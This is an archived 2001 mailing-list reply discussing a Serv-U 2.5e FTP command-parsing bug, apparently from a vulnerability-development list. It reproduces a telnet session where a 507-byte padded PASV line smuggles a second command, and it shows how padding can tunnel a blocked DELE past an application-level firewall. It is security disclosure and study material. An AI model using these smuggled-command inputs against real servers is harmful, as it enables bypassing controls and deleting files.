Re: serv-u 2.5e

From: BORBELY Zoltan (bozoat_private)
Date: Tue Jul 24 2001 - 00:48:12 PDT

Next message: Tom Geldner: "RE: Win32.Sircam.Worm Alert....."

Previous message: Johnson, Greg: "RE: Win32.Sircam.Worm Alert....."
In reply to: perkere stinker: "serv-u 2.5e"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Mon, Jul 23, 2001 at 07:37:38PM +0000, perkere stinker wrote:
> log in, issue a PASV [buf] where buf is 507 bytes, after that you can issue 
> a new command all in the same line. Can this be exploited anyway? Does it 
> work on other versions? Is this pure crap? I dont know. Guess thats what 
> vuln-dev is for?
> 
> example:
> 
> [foo@bar foo]$ telnet serv-u-server 21
> Trying 193.89.248.81...
> Connected to serv-u-server.
> Escape character is '^]'.
> 220 Serv-U FTP-Server v2.5e for WinSock ready...
> user perkere
> 331 User name okay, need password.
> pass stinker
> 230 User logged in, proceed.
> PASV 
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACWD 
> upload
> 227 Entering Passive Mode (193,89,248,81,7,177)
> 250 Directory changed to /f:/Download/upload
> 
> End example

Is the command really important? I think I've discovered the same bug about
one year ago, but I had checked the wu-ftpd. This "feature" can be really bad.
E.g. you are using application level firewall and you configured your gateway
to disable the delete command. If the gateway doesn't check the proper line
termination (<CR><LF>) after the command you can tunnel a disabled command
inside an allowed command:

CWD AAAAAAAAAAAAAAAAAAAAAA[...]AAAAAAAAAAAADELE foo

I had sent a mail to CERT but nothing happened. I had no time that time so
the story had ended. I've checked to wu-ftpd and proftpd and both are affected.
I think most of the ftp daemons are affected.

It's very easy to implement this bad behaviour. The following pseudo C code
fragment will show a tipical bad approach:

	while ( fgets(buff,sizeof(buff),f) != NULL )
	{
	    /* remove line termination if any */
	    ...

	    handle_command(buff);
	}

Next message: Tom Geldner: "RE: Win32.Sircam.Worm Alert....."
Previous message: Johnson, Greg: "RE: Win32.Sircam.Worm Alert....."
In reply to: perkere stinker: "serv-u 2.5e"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jul 24 2001 - 19:04:03 PDT